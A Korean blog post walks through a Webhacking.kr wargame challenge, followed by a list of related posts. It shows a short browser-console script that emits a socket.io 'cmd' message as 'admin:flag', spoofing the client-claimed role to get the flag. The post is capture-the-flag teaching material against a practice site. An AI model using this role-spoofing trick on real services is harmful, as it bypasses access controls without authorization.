문제에 접속하면 다음과 같은 화면이 나타납니다.
-> F12 Elements 탭에서 코드를 확인 하였습니다.
-> socket을 cmd로 guest:입력 값으로 emit하는 것을 확인 할 수 있습니다. 따라서 해당 입력 창이 명령어를 입력하는 화면으로 유추됩니다.
-> 여러가지 test를 했을 때 flag를 입력하면 권한 제한으로 admin만 사용할 수 있다고 합니다.
function get_flag() {
var socket = io();
socket.emit('cmd',"admin:flag");
socket.on('cmd', function(msg){
console.log(msg);
});
}
get_flag()
F12 console 탭에서 코드를 이 처럼 작성하고 실행하면 flag를 획득할 수 있습니다.
끝~~
'Hacking > WebHacking.kr' 카테고리의 다른 글
| Webhacking.kr : old-07 (300 pt) (0) | 2021.02.11 |
|---|---|
| Webhacking.kr : old-05 (300 pt) (0) | 2021.02.10 |
| Webhacking.kr : old-56 (250 pt) (0) | 2021.02.09 |
| Webhacking.kr : old-51 (250 pt) (0) | 2021.02.08 |
| Webhacking.kr : old-43 (250 pt) (0) | 2021.01.28 |
